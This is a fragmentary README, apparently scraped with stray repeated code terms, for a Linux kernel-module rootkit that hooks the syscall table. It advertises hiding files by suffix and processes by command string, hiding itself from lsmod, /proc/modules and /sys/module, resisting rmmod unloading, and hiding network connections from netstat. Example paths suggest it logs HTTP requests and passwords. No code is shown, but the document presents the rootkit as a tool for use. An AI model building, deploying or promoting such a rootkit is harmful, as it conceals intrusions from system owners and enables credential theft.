Yet another LKM rootkit for Linux. It hooks syscall table. Features: Hide files that ends on configured suffix (FILE_SUFFIX - ".rootkit" by default).
FILE_SUFFIX
COMMAND_CONTAINS
Examples:
.//./malicious_process
wget http://old-releases.ubuntu.com/releases/zesty/ubuntu-17.04-desktop-amd64.iso .//./
/etc/http_requests[FILE_SUFFIX]
/etc/passwords[FILE_SUFFIX]
- Rootkit module is invisible in lsmod output, file /proc/modules, and directory /sys/module/.
lsmod
/proc/modules
/sys/module/
- It isn't possible to unload rootkit by rmmod command (if option UNABLE_TO_UNLOAD is set).
rmmod
UNABLE_TO_UNLOAD
- Netstat and similar tools won't see TCP connections of hidden processes. Configuration: The configuration is placed at the beginning of file rootkit.c.Below is a default configuration:
rootkit.c
Linux x 4.13.0-kali1-amd64 #1 SMP Debian 4.13.10-1kali2 (2017-11-08) x86_64 GNU/Linux